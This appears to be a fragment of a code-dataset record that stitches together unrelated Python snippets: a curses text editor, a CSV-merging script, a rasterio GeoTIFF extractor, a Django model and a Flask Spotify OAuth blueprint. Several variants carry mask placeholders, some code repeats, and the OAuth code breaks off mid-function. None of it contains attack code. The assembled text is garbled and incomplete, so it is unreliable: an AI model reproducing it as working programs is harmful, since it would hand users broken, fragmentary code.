"step-4": "import sys\nimport os\nimport traceback\nfrom src.properties import *\nfrom src.utils import *\nfrom subprocess import call\nfrom src.entity.cursor import Cursor\nfrom curses import *\n\n\ndef main(screen, file_path):\n setUpEnv()\n text = readFileIfExist(file_path)\n while 1:\n try:\n text = startEditing(screen, text)\n printQuitOptions(screen)\n char = screen.getch()\n if char == KEY_ENTER_CODE:\n writeToFile(file_path, text)\n return 3, None\n elif char == KEY_F9:\n return 2, None\n else:\n pass\n except KeyboardInterrupt:\n return 1, None\n except:\n error_msg = traceback.format_exc()\n return -1, error_msg\n\n\ndef setUpEnv():\n use_default_colors()\n init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)\n\n\ndef startEditing(screen, text):\n cursor = Cursor(screen, BORDER_COLOR, text)\n while 1:\n char = screen.getch()\n if char == KEY_F1:\n break\n elif char == TERMINAL_RESIZE_CODE:\n cursor.resizeTextBox()\n elif char == KEY_RIGHT:\n cursor.moveRight()\n elif char == KEY_LEFT:\n cursor.moveLeft()\n elif char == KEY_UP:\n cursor.moveUp()\n elif char == KEY_DOWN:\n cursor.moveDown()\n elif 31 < char < 127:\n cursor.writeChar(char)\n elif char == KEY_DELETE_CODE:\n cursor.delete()\n elif char == 10 or char == 13 or char == KEY_ENTER:\n cursor.newLine()\n elif char == KEY_TAB_CODE:\n cursor.tab()\n elif char == KEY_ESCAPE_CODE:\n char = screen.getch()\n if char == KEY_LEFT or char == 98:\n cursor.moveToLeftMost()\n elif char == KEY_RIGHT or char == 102:\n cursor.moveToRightMost()\n elif char == KEY_DELETE_CODE:\n cursor.deleteWholeLine()\n elif char == KEY_DOWN:\n cursor.moveToRightBottomMost()\n elif char == KEY_UP:\n cursor.moveToRightUpMost()\n else:\n ungetch(char)\n else:\n cursor._writeString(str(char))\n return cursor.getText()\n\n\ndef printQuitOptions(screen):\n height, width = screen.getmaxyx()\n screen.clear()\n y = int(height / 2.5)\n x = int(width / 2.5)\n screen.addstr(y, x, 'Quit and Save (ENTER)')\n screen.addstr(y + 1, x, 'Quit (F9)')\n 
screen.addstr(y + 2, x, 'Go Back (Any Key)')\n screen.refresh()\n\n\ndef printExitMessage(exit_code, error_msg):\n if exit_code == -1:\n printToTerminal('Shit just happen, sorry.')\n if error_msg:\n printToTerminal(error_msg)\n elif exit_code == 1:\n printToTerminal('Quit, safe and sound.')\n elif exit_code == 2:\n printToTerminal('Quit without save.')\n elif exit_code == 3:\n printToTerminal('saved !')\n elif exit_code == 4:\n printToTerminal(VERSION)\n elif exit_code == 5:\n printToTerminal(\n '======================== Welcome to Simple Editor X ========================'\n , 'GREEN')\n printToTerminal('')\n printToTerminal('Arguments:')\n printToTerminal(' -version')\n printToTerminal(' -help')\n printToTerminal(\n ' {file_name}, to start editing an existing or create a new file'\n )\n printToTerminal('')\n printToTerminal('While using:')\n printToTerminal(' Press F1, then ENTER to save')\n printToTerminal('')\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n printToTerminal('This application take exactly 1 argument')\n printToTerminal(\"type: 'sex -help' for more details\")\n exit(69)\n error_msg = ''\n exit_code = -1\n arg = sys.argv[1].lower()\n file_path = sys.argv[1]\n if arg == '-v' or arg == '-version':\n exit_code = 4\n elif arg == '-h' or arg == '-help':\n exit_code = 5\n else:\n exit_code, error_msg = wrapper(main, file_path)\n printExitMessage(exit_code, error_msg)\n",
"step-5": "import sys\nimport os\nimport traceback\nfrom src.properties import *\nfrom src.utils import *\nfrom subprocess import call\nfrom src.entity.cursor import Cursor\nfrom curses import *\n\n\ndef main(screen, file_path):\n setUpEnv()\n text = readFileIfExist(file_path)\n while 1:\n try:\n text = startEditing(screen, text)\n printQuitOptions(screen)\n char = screen.getch()\n if char == KEY_ENTER_CODE:\n writeToFile(file_path, text)\n return 3, None\n elif char == KEY_F9:\n return 2, None\n else:\n pass\n except KeyboardInterrupt: # quit properly, when user press Ctrl + C\n return 1, None\n except:\n error_msg = traceback.format_exc()\n return -1, error_msg\n\n\ndef setUpEnv():\n use_default_colors()\n init_pair(BORDER_COLOR, COLOR_MAGENTA, -1)\n\n\ndef startEditing(screen, text):\n cursor = Cursor(screen, BORDER_COLOR, text)\n while 1:\n char = screen.getch()\n if char == KEY_F1:\n break\n elif char == TERMINAL_RESIZE_CODE:\n cursor.resizeTextBox()\n elif char == KEY_RIGHT:\n cursor.moveRight()\n elif char == KEY_LEFT:\n cursor.moveLeft()\n elif char == KEY_UP:\n cursor.moveUp()\n elif char == KEY_DOWN:\n cursor.moveDown()\n elif 31 < char < 127:\n cursor.writeChar(char)\n elif char == KEY_DELETE_CODE:\n cursor.delete()\n elif char == 10 or char == 13 or char == KEY_ENTER:\n cursor.newLine()\n elif char == KEY_TAB_CODE:\n cursor.tab()\n elif char == KEY_ESCAPE_CODE:\n char = screen.getch() # get the key pressed after cmd or alt\n if char == KEY_LEFT or char == 98: # 98 and 102 are left and right keys produced while pressing alt, on mac terminal\n cursor.moveToLeftMost()\n elif char == KEY_RIGHT or char == 102: # CMD + RIGHT\n cursor.moveToRightMost()\n elif char == KEY_DELETE_CODE: # CMD + DELETE\n cursor.deleteWholeLine()\n elif char == KEY_DOWN: # CMD + DOWN\n cursor.moveToRightBottomMost()\n elif char == KEY_UP: # CMD + UP\n cursor.moveToRightUpMost()\n else: # in case char user press ESC, it produce the same effec as CMD or ALT, but that's not what we 
want\n ungetch(char)\n else:\n cursor._writeString(str(char))\n return cursor.getText()\n\n\ndef printQuitOptions(screen):\n height, width = screen.getmaxyx()\n screen.clear()\n y = int(height / 2.5)\n x = int(width / 2.5)\n screen.addstr(y, x, \"Quit and Save (ENTER)\")\n screen.addstr(y + 1, x, \"Quit (F9)\")\n screen.addstr(y + 2, x, \"Go Back (Any Key)\")\n screen.refresh()\n\n\ndef printExitMessage(exit_code, error_msg):\n if exit_code == -1:\n printToTerminal(\"Shit just happen, sorry.\")\n if error_msg:\n printToTerminal(error_msg)\n elif exit_code == 1:\n printToTerminal(\"Quit, safe and sound.\")\n elif exit_code == 2:\n printToTerminal(\"Quit without save.\")\n elif exit_code == 3:\n printToTerminal(\"saved !\")\n elif exit_code == 4: # -version\n printToTerminal(VERSION)\n elif exit_code == 5: # -help\n printToTerminal(\"======================== Welcome to Simple Editor X ========================\", \"GREEN\")\n printToTerminal(\"\")\n printToTerminal(\"Arguments:\")\n printToTerminal(\" -version\")\n printToTerminal(\" -help\")\n printToTerminal(\" {file_name}, to start editing an existing or create a new file\")\n printToTerminal(\"\")\n printToTerminal(\"While using:\")\n printToTerminal(\" Press F1, then ENTER to save\")\n printToTerminal(\"\")\n\n\nif __name__== \"__main__\":\n if len(sys.argv) != 2:\n printToTerminal(\"This application take exactly 1 argument\")\n printToTerminal(\"type: 'sex -help' for more details\")\n exit(69)\n error_msg = \"\"\n exit_code = -1\n arg = sys.argv[1].lower()\n file_path = sys.argv[1]\n if arg == \"-v\" or arg == \"-version\":\n exit_code = 4\n elif arg == \"-h\" or arg == \"-help\":\n exit_code = 5\n else:\n exit_code, error_msg = wrapper(main, file_path)\n\n printExitMessage(exit_code, error_msg)\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for classf in classes:
PWD = os.getcwd() + '/' + classf + '/'
currentdname = os.path.basename(os.getcwd())
csvfiles = glob.glob(PWD + '/*.csv')
df = pd.DataFrame(columns=['image', 'x', 'y', 'num'])
if os.path.exists(PWD + classf + '_' + currentdname + '.csv'):
print('csv file already exists.')
continue
for csvfile in csvfiles:
csvname = os.path.basename(csvfile)
df_each = pd.read_csv(csvfile, index_col=0)
df = df.append(df_each, ignore_index=True)
df.to_csv(PWD + classf + '_' + currentdname + '.csv')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
classes = os.listdir(os.getcwd())
for classf in classes:
PWD = os.getcwd() + '/' + classf + '/'
currentdname = os.path.basename(os.getcwd())
csvfiles = glob.glob(PWD + '/*.csv')
df = pd.DataFrame(columns=['image', 'x', 'y', 'num'])
if os.path.exists(PWD + classf + '_' + currentdname + '.csv'):
print('csv file already exists.')
continue
for csvfile in csvfiles:
csvname = os.path.basename(csvfile)
df_each = pd.read_csv(csvfile, index_col=0)
df = df.append(df_each, ignore_index=True)
df.to_csv(PWD + classf + '_' + currentdname + '.csv')
<|reserved_special_token_1|>
import os
import glob
import pandas as pd
classes = os.listdir(os.getcwd())
for classf in classes:
PWD = os.getcwd() + '/' + classf + '/'
currentdname = os.path.basename(os.getcwd())
csvfiles = glob.glob(PWD + '/*.csv')
df = pd.DataFrame(columns=['image', 'x', 'y', 'num'])
if os.path.exists(PWD + classf + '_' + currentdname + '.csv'):
print('csv file already exists.')
continue
for csvfile in csvfiles:
csvname = os.path.basename(csvfile)
df_each = pd.read_csv(csvfile, index_col=0)
df = df.append(df_each, ignore_index=True)
df.to_csv(PWD + classf + '_' + currentdname + '.csv')
<|reserved_special_token_1|>
import os
import glob
import pandas as pd

classes = os.listdir(os.getcwd())

for classf in classes:
    # Each class sub-directory holds per-image CSVs to be merged into one
    # combined "<class>_<parent-dir>.csv" file inside that sub-directory.
    PWD = os.getcwd() + "/" + classf + "/"
    currentdname = os.path.basename(os.getcwd())
    csvfiles = glob.glob(PWD + "/*.csv")

    out_path = PWD + classf + "_" + currentdname + ".csv"
    if os.path.exists(out_path):
        print('csv file already exists.')
        continue

    # Seed with an empty frame so the output keeps these columns even when
    # the directory contains no CSV files (matches the original behaviour).
    frames = [pd.DataFrame(columns=['image', 'x', 'y', 'num'])]
    for csvfile in csvfiles:
        frames.append(pd.read_csv(csvfile, index_col=0))

    # DataFrame.append was removed in pandas 2.0; concatenate once instead
    # of growing the frame row-group by row-group.
    pd.concat(frames, ignore_index=True).to_csv(out_path)
|
flexible
|
{
"blob_id": "3ebd455056f168f8f69b9005c643c519e5d0b436",
"index": 8286,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor classf in classes:\n PWD = os.getcwd() + '/' + classf + '/'\n currentdname = os.path.basename(os.getcwd())\n csvfiles = glob.glob(PWD + '/*.csv')\n df = pd.DataFrame(columns=['image', 'x', 'y', 'num'])\n if os.path.exists(PWD + classf + '_' + currentdname + '.csv'):\n print('csv file already exists.')\n continue\n for csvfile in csvfiles:\n csvname = os.path.basename(csvfile)\n df_each = pd.read_csv(csvfile, index_col=0)\n df = df.append(df_each, ignore_index=True)\n df.to_csv(PWD + classf + '_' + currentdname + '.csv')\n",
"step-3": "<mask token>\nclasses = os.listdir(os.getcwd())\nfor classf in classes:\n PWD = os.getcwd() + '/' + classf + '/'\n currentdname = os.path.basename(os.getcwd())\n csvfiles = glob.glob(PWD + '/*.csv')\n df = pd.DataFrame(columns=['image', 'x', 'y', 'num'])\n if os.path.exists(PWD + classf + '_' + currentdname + '.csv'):\n print('csv file already exists.')\n continue\n for csvfile in csvfiles:\n csvname = os.path.basename(csvfile)\n df_each = pd.read_csv(csvfile, index_col=0)\n df = df.append(df_each, ignore_index=True)\n df.to_csv(PWD + classf + '_' + currentdname + '.csv')\n",
"step-4": "import os\nimport glob\nimport pandas as pd\nclasses = os.listdir(os.getcwd())\nfor classf in classes:\n PWD = os.getcwd() + '/' + classf + '/'\n currentdname = os.path.basename(os.getcwd())\n csvfiles = glob.glob(PWD + '/*.csv')\n df = pd.DataFrame(columns=['image', 'x', 'y', 'num'])\n if os.path.exists(PWD + classf + '_' + currentdname + '.csv'):\n print('csv file already exists.')\n continue\n for csvfile in csvfiles:\n csvname = os.path.basename(csvfile)\n df_each = pd.read_csv(csvfile, index_col=0)\n df = df.append(df_each, ignore_index=True)\n df.to_csv(PWD + classf + '_' + currentdname + '.csv')\n",
"step-5": "import os\nimport glob\nimport pandas as pd\n\nclasses = os.listdir(os.getcwd())\n\nfor classf in classes:\n\t#if os.path.isfile(classf) or classf == 'LAST':\n\t\t#continue\n\t\t\n\tPWD = os.getcwd() + \"/\" + classf + \"/\"\n\tcurrentdname = os.path.basename(os.getcwd())\n\tcsvfiles=glob.glob(PWD + \"/*.csv\")\n\t\n\tdf = pd.DataFrame(columns=['image', 'x', 'y', 'num'])\n\t\n\tif os.path.exists(PWD + classf + \"_\" + currentdname + \".csv\"):\n\t\tprint('csv file already exists.')\n\t\tcontinue\n\t\n\tfor csvfile in csvfiles:\n\t\tcsvname = os.path.basename(csvfile)\n\t\tdf_each = pd.read_csv(csvfile, index_col=0)\n\t\tdf = df.append(df_each, ignore_index=True)\n\t\t\n\tdf.to_csv(PWD + classf + \"_\" + currentdname + \".csv\")\n\t\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from xai.brain.wordbase.verbs._hinder import _HINDER
# class header
class _HINDERED(_HINDER):
    """Word entry for the past-tense form of the verb 'hinder'."""

    def __init__(self):
        _HINDER.__init__(self)
        # Identifying metadata for this word form.
        self.name = "HINDERED"
        self.specie = "verbs"
        self.basic = "hinder"
        self.jsondata = {}
|
normal
|
{
"blob_id": "420beba5b6fd575ab9be0c907ae0698ba7be5220",
"index": 4622,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass _HINDERED(_HINDER):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass _HINDERED(_HINDER):\n\n def __init__(self):\n _HINDER.__init__(self)\n self.name = 'HINDERED'\n self.specie = 'verbs'\n self.basic = 'hinder'\n self.jsondata = {}\n",
"step-4": "from xai.brain.wordbase.verbs._hinder import _HINDER\n\n\nclass _HINDERED(_HINDER):\n\n def __init__(self):\n _HINDER.__init__(self)\n self.name = 'HINDERED'\n self.specie = 'verbs'\n self.basic = 'hinder'\n self.jsondata = {}\n",
"step-5": "\n\nfrom xai.brain.wordbase.verbs._hinder import _HINDER\n\n#calss header\nclass _HINDERED(_HINDER, ):\n\tdef __init__(self,): \n\t\t_HINDER.__init__(self)\n\t\tself.name = \"HINDERED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"hinder\"\n\t\tself.jsondata = {}\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import rasterio as rio
from affine import Affine
colour_data = []


def generate_colour_data(width, height, imagiry_data, pixel2coord):
    """Extract band-1 values from a raster into the module-level ``colour_data``.

    Appends one ``[x, y, value]`` entry per visited pixel, where ``(x, y)``
    comes from ``pixel2coord`` and ``value`` from band 1 of the raster.

    :param width: raster width in pixels (columns)
    :param height: raster height in pixels (rows)
    :param imagiry_data: open raster dataset exposing ``read`` (e.g. rasterio)
    :param pixel2coord: callable mapping ``(col, row)`` to ``(x, y)`` coordinates
    """
    # PERF FIX: the original called imagiry_data.read([1]) inside the nested
    # loops, re-reading the whole band for every single pixel; read it once.
    band = imagiry_data.read([1])[0]
    # NOTE(review): the ranges start at 1 and stop before width/height, so the
    # last row and column are never visited — preserved from the original;
    # confirm this is intended.
    for i in range(1, height):
        for j in range(1, width):
            x, y = pixel2coord(j, i)
            colour_data.append([x, y, band[i - 1][j - 1]])
# Extracts the width, height and affine transformation of the .tiff file and
# passes them to generate_colour_data, which populates colour_data with entries
# of the form [longitude, latitude, band-1 value].
# Opens the GeoTIFF and walks its pixels; runs at import/script time.
with rio.open(r'C:\Users\user.DESKTOP-OMQ89VA\Documents\USGS-LIDAR-\data\iowa.tif') as imagery_data:
    T0 = imagery_data.transform  # affine transform: pixel indices -> CRS coords
    # Shift by half a pixel so coordinates refer to pixel centres rather
    # than the pixels' top-left corners.
    T1 = T0 * Affine.translation(0.5, 0.5)
    pixel2coord = lambda c, r: (c, r) * T1  # (col, row) -> (x, y)
    width = imagery_data.width
    height = imagery_data.height
    generate_colour_data(width, height, imagery_data, pixel2coord)
|
normal
|
{
"blob_id": "7e8b192e77e857f1907d5272d03c1138a10c61f4",
"index": 4803,
"step-1": "<mask token>\n\n\ndef generate_colour_data(width, height, imagiry_data, pixel2coord):\n \"\"\"Extract color data from the .tiff file \"\"\"\n for i in range(1, height):\n for j in range(1, width):\n colour_data.append([pixel2coord(j, i)[0], pixel2coord(j, i)[1],\n imagiry_data.read([1])[0][i - 1][j - 1]])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef generate_colour_data(width, height, imagiry_data, pixel2coord):\n \"\"\"Extract color data from the .tiff file \"\"\"\n for i in range(1, height):\n for j in range(1, width):\n colour_data.append([pixel2coord(j, i)[0], pixel2coord(j, i)[1],\n imagiry_data.read([1])[0][i - 1][j - 1]])\n\n\nwith rio.open(\n 'C:\\\\Users\\\\user.DESKTOP-OMQ89VA\\\\Documents\\\\USGS-LIDAR-\\\\data\\\\iowa.tif'\n ) as imagery_data:\n T0 = imagery_data.transform\n T1 = T0 * Affine.translation(0.5, 0.5)\n pixel2coord = lambda c, r: (c, r) * T1\n width = imagery_data.width\n height = imagery_data.height\n generate_colour_data(width, height, imagery_data, pixel2coord)\n",
"step-3": "<mask token>\ncolour_data = []\n\n\ndef generate_colour_data(width, height, imagiry_data, pixel2coord):\n \"\"\"Extract color data from the .tiff file \"\"\"\n for i in range(1, height):\n for j in range(1, width):\n colour_data.append([pixel2coord(j, i)[0], pixel2coord(j, i)[1],\n imagiry_data.read([1])[0][i - 1][j - 1]])\n\n\nwith rio.open(\n 'C:\\\\Users\\\\user.DESKTOP-OMQ89VA\\\\Documents\\\\USGS-LIDAR-\\\\data\\\\iowa.tif'\n ) as imagery_data:\n T0 = imagery_data.transform\n T1 = T0 * Affine.translation(0.5, 0.5)\n pixel2coord = lambda c, r: (c, r) * T1\n width = imagery_data.width\n height = imagery_data.height\n generate_colour_data(width, height, imagery_data, pixel2coord)\n",
"step-4": "import rasterio as rio\nfrom affine import Affine\ncolour_data = []\n\n\ndef generate_colour_data(width, height, imagiry_data, pixel2coord):\n \"\"\"Extract color data from the .tiff file \"\"\"\n for i in range(1, height):\n for j in range(1, width):\n colour_data.append([pixel2coord(j, i)[0], pixel2coord(j, i)[1],\n imagiry_data.read([1])[0][i - 1][j - 1]])\n\n\nwith rio.open(\n 'C:\\\\Users\\\\user.DESKTOP-OMQ89VA\\\\Documents\\\\USGS-LIDAR-\\\\data\\\\iowa.tif'\n ) as imagery_data:\n T0 = imagery_data.transform\n T1 = T0 * Affine.translation(0.5, 0.5)\n pixel2coord = lambda c, r: (c, r) * T1\n width = imagery_data.width\n height = imagery_data.height\n generate_colour_data(width, height, imagery_data, pixel2coord)\n",
"step-5": "import rasterio as rio\nfrom affine import Affine\n\ncolour_data = []\ndef generate_colour_data(width, height, imagiry_data, pixel2coord):\n \"\"\"Extract color data from the .tiff file \"\"\"\n for i in range(1, height):\n for j in range(1, width):\n colour_data.append(\n [\n pixel2coord(j, i)[0],\n pixel2coord(j, i)[1],\n imagiry_data.read([1])[0][i - 1][j - 1],\n \n ]\n )\n#Code that will extract the width, height and transformation information of the .tiff file and pass it to the function \n# generate_colour_data which will populate the color data in a list in the following format: [longitude, latitude, Red, Green, Blue, Alpha]\nwith rio.open(r'C:\\Users\\user.DESKTOP-OMQ89VA\\Documents\\USGS-LIDAR-\\data\\iowa.tif') as imagery_data:\n T0 = imagery_data.transform\n T1 = T0 * Affine.translation(0.5, 0.5)\n pixel2coord = lambda c, r: (c, r) * T1\n width = imagery_data.width\n height = imagery_data.height\n \n generate_colour_data(width, height, imagery_data, pixel2coord)\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class OfferRequirement(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class OfferRequirement(models.Model):
skill = models.ForeignKey(skill, on_delete=models.DO_NOTHING, default='')
offer = models.ForeignKey(Offer, on_delete=models.CASCADE, default='')
<|reserved_special_token_1|>
from django.db import models
from skills.models import skill
from offres.models import Offer
class OfferRequirement(models.Model):
skill = models.ForeignKey(skill, on_delete=models.DO_NOTHING, default='')
offer = models.ForeignKey(Offer, on_delete=models.CASCADE, default='')
<|reserved_special_token_1|>
from django.db import models
from skills.models import skill
from offres.models import Offer
# Create your models here.
class OfferRequirement(models.Model):
skill = models.ForeignKey(skill, on_delete=models.DO_NOTHING ,default="")
offer = models.ForeignKey(Offer , on_delete=models.CASCADE, default="")
|
flexible
|
{
"blob_id": "3640f1df412b43b42fb4e856604508f698a208ad",
"index": 6385,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass OfferRequirement(models.Model):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass OfferRequirement(models.Model):\n skill = models.ForeignKey(skill, on_delete=models.DO_NOTHING, default='')\n offer = models.ForeignKey(Offer, on_delete=models.CASCADE, default='')\n",
"step-4": "from django.db import models\nfrom skills.models import skill\nfrom offres.models import Offer\n\n\nclass OfferRequirement(models.Model):\n skill = models.ForeignKey(skill, on_delete=models.DO_NOTHING, default='')\n offer = models.ForeignKey(Offer, on_delete=models.CASCADE, default='')\n",
"step-5": "from django.db import models\nfrom skills.models import skill\nfrom offres.models import Offer \n\n# Create your models here.\nclass OfferRequirement(models.Model):\n skill = models.ForeignKey(skill, on_delete=models.DO_NOTHING ,default=\"\")\n offer = models.ForeignKey(Offer , on_delete=models.CASCADE, default=\"\")",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
@bp.route('/login')
def login():
"""
: Create session and login user
: PARAMS None
: RETURN <view>
"""
try:
session.clear()
return redirect(SP_OAUTH.get_authorize_url())
except ConnectionError as e:
flash('Connection error')
@bp.route('/callback/')
def callback():
"""
: Redirect user after login
: PARAMS None
: RETURN <view>
"""
code = request.args.get('code')
token = SP_OAUTH.get_access_token(code)
if token:
session['token'] = token['access_token']
session['refresh'] = token['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError as e:
return redirect(url_for('home'))
else:
flash('Cannot get access token')
return redirect(url_for('home'))
@bp.route('/logout')
def logout():
"""
: Clear session and log user out
: PARAMS None
: RETURN <view>
"""
session.clear()
return redirect(url_for('home'))
def login_required(view):
@functools.wraps(view)
def wrapped_view(**kwargs):
if 'refresh' in session:
refresh = SP_OAUTH.refresh_access_token(session['refresh'])
session['token'] = refresh['access_token']
session['refresh'] = refresh['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError:
return redirect(url_for('home'))
return view(**kwargs)
else:
return redirect(url_for('home'))
return wrapped_view
<|reserved_special_token_1|>
<|reserved_special_token_0|>
config.read('spotify.cfg')
<|reserved_special_token_0|>
@bp.route('/login')
def login():
"""
: Create session and login user
: PARAMS None
: RETURN <view>
"""
try:
session.clear()
return redirect(SP_OAUTH.get_authorize_url())
except ConnectionError as e:
flash('Connection error')
@bp.route('/callback/')
def callback():
"""
: Redirect user after login
: PARAMS None
: RETURN <view>
"""
code = request.args.get('code')
token = SP_OAUTH.get_access_token(code)
if token:
session['token'] = token['access_token']
session['refresh'] = token['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError as e:
return redirect(url_for('home'))
else:
flash('Cannot get access token')
return redirect(url_for('home'))
@bp.route('/logout')
def logout():
"""
: Clear session and log user out
: PARAMS None
: RETURN <view>
"""
session.clear()
return redirect(url_for('home'))
def login_required(view):
@functools.wraps(view)
def wrapped_view(**kwargs):
if 'refresh' in session:
refresh = SP_OAUTH.refresh_access_token(session['refresh'])
session['token'] = refresh['access_token']
session['refresh'] = refresh['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError:
return redirect(url_for('home'))
return view(**kwargs)
else:
return redirect(url_for('home'))
return wrapped_view
<|reserved_special_token_1|>
<|reserved_special_token_0|>
bp = Blueprint('auth', __name__, url_prefix='/auth')
config = ConfigParser()
config.read('spotify.cfg')
CLIENT_ID = config.get('SPOTIFY', 'CLIENT_ID').strip("'")
CLIENT_SECRET = config.get('SPOTIFY', 'CLIENT_SECRET').strip("'")
REDIRECT_URI = config.get('SPOTIFY', 'REDIRECT_URI').strip("'")
SCOPE = 'user-read-currently-playing user-library-read playlist-read-private'
SP_OAUTH = oauth2.SpotifyOAuth(CLIENT_ID, CLIENT_SECRET, REDIRECT_URI,
scope=SCOPE)
@bp.route('/login')
def login():
"""
: Create session and login user
: PARAMS None
: RETURN <view>
"""
try:
session.clear()
return redirect(SP_OAUTH.get_authorize_url())
except ConnectionError as e:
flash('Connection error')
@bp.route('/callback/')
def callback():
"""
: Redirect user after login
: PARAMS None
: RETURN <view>
"""
code = request.args.get('code')
token = SP_OAUTH.get_access_token(code)
if token:
session['token'] = token['access_token']
session['refresh'] = token['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError as e:
return redirect(url_for('home'))
else:
flash('Cannot get access token')
return redirect(url_for('home'))
@bp.route('/logout')
def logout():
"""
: Clear session and log user out
: PARAMS None
: RETURN <view>
"""
session.clear()
return redirect(url_for('home'))
def login_required(view):
@functools.wraps(view)
def wrapped_view(**kwargs):
if 'refresh' in session:
refresh = SP_OAUTH.refresh_access_token(session['refresh'])
session['token'] = refresh['access_token']
session['refresh'] = refresh['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError:
return redirect(url_for('home'))
return view(**kwargs)
else:
return redirect(url_for('home'))
return wrapped_view
<|reserved_special_token_1|>
from base64 import b64encode
from configparser import ConfigParser
import functools
from flask import Blueprint, flash, redirect, render_template, request, session, url_for, app
from requests.exceptions import SSLError
import spotipy
from spotipy import oauth2
bp = Blueprint('auth', __name__, url_prefix='/auth')
config = ConfigParser()
config.read('spotify.cfg')
CLIENT_ID = config.get('SPOTIFY', 'CLIENT_ID').strip("'")
CLIENT_SECRET = config.get('SPOTIFY', 'CLIENT_SECRET').strip("'")
REDIRECT_URI = config.get('SPOTIFY', 'REDIRECT_URI').strip("'")
SCOPE = 'user-read-currently-playing user-library-read playlist-read-private'
SP_OAUTH = oauth2.SpotifyOAuth(CLIENT_ID, CLIENT_SECRET, REDIRECT_URI,
scope=SCOPE)
@bp.route('/login')
def login():
"""
: Create session and login user
: PARAMS None
: RETURN <view>
"""
try:
session.clear()
return redirect(SP_OAUTH.get_authorize_url())
except ConnectionError as e:
flash('Connection error')
@bp.route('/callback/')
def callback():
"""
: Redirect user after login
: PARAMS None
: RETURN <view>
"""
code = request.args.get('code')
token = SP_OAUTH.get_access_token(code)
if token:
session['token'] = token['access_token']
session['refresh'] = token['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError as e:
return redirect(url_for('home'))
else:
flash('Cannot get access token')
return redirect(url_for('home'))
@bp.route('/logout')
def logout():
"""
: Clear session and log user out
: PARAMS None
: RETURN <view>
"""
session.clear()
return redirect(url_for('home'))
def login_required(view):
@functools.wraps(view)
def wrapped_view(**kwargs):
if 'refresh' in session:
refresh = SP_OAUTH.refresh_access_token(session['refresh'])
session['token'] = refresh['access_token']
session['refresh'] = refresh['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError:
return redirect(url_for('home'))
return view(**kwargs)
else:
return redirect(url_for('home'))
return wrapped_view
<|reserved_special_token_1|>
from base64 import b64encode
from configparser import ConfigParser
import functools
from flask import (
Blueprint, flash, redirect, render_template, request, session, url_for, app
)
from requests.exceptions import SSLError
import spotipy
from spotipy import oauth2
# Auth blueprint: every route below is mounted under the /auth prefix.
bp = Blueprint('auth', __name__, url_prefix='/auth')
# Spotify credentials are loaded at import time from spotify.cfg; the
# .strip("'") calls tolerate values that were quoted in the config file.
config = ConfigParser()
config.read('spotify.cfg')
CLIENT_ID = config.get('SPOTIFY', 'CLIENT_ID').strip("'")
CLIENT_SECRET = config.get('SPOTIFY', 'CLIENT_SECRET').strip("'")
REDIRECT_URI = config.get('SPOTIFY', 'REDIRECT_URI').strip("'")
# OAuth scopes requested from Spotify for the user token.
SCOPE = 'user-read-currently-playing user-library-read playlist-read-private'
SP_OAUTH = oauth2.SpotifyOAuth(CLIENT_ID, CLIENT_SECRET, REDIRECT_URI, scope=SCOPE)
@bp.route('/login')
def login():
    """Start the Spotify OAuth flow.

    Clears any stale session state and redirects the user to Spotify's
    authorization page.

    :return: redirect to the Spotify authorize URL, or home on failure.
    """
    try:
        session.clear()
        return redirect(SP_OAUTH.get_authorize_url())
    except ConnectionError:
        flash("Connection error")
        # BUG FIX: this path previously fell off the end and returned None,
        # which Flask rejects with a 500; send the user home instead.
        return redirect(url_for('home'))
@bp.route('/callback/')
def callback():
    """Handle the redirect back from Spotify after login.

    Exchanges the ``code`` query parameter for access/refresh tokens,
    stores them in the session, and records the user's display name.

    :return: redirect to the ``home`` view in every case.
    """
    code = request.args.get('code')
    token = SP_OAUTH.get_access_token(code)
    if token:
        session['token'] = token['access_token']
        session['refresh'] = token['refresh_token']
        sp = spotipy.Spotify(auth=session['token'])
        try:
            cu = sp.current_user()
            session['display_name'] = cu['display_name']
        except SSLError:
            return redirect(url_for('home'))
    else:
        flash("Cannot get access token")
    # BUG FIX: the successful-token path previously fell off the end and
    # returned None, which Flask rejects with a 500; always redirect home.
    return redirect(url_for('home'))
@bp.route('/logout')
def logout():
    """Log the user out by discarding all session data, then go home."""
    session.clear()
    home = url_for('home')
    return redirect(home)
def login_required(view):
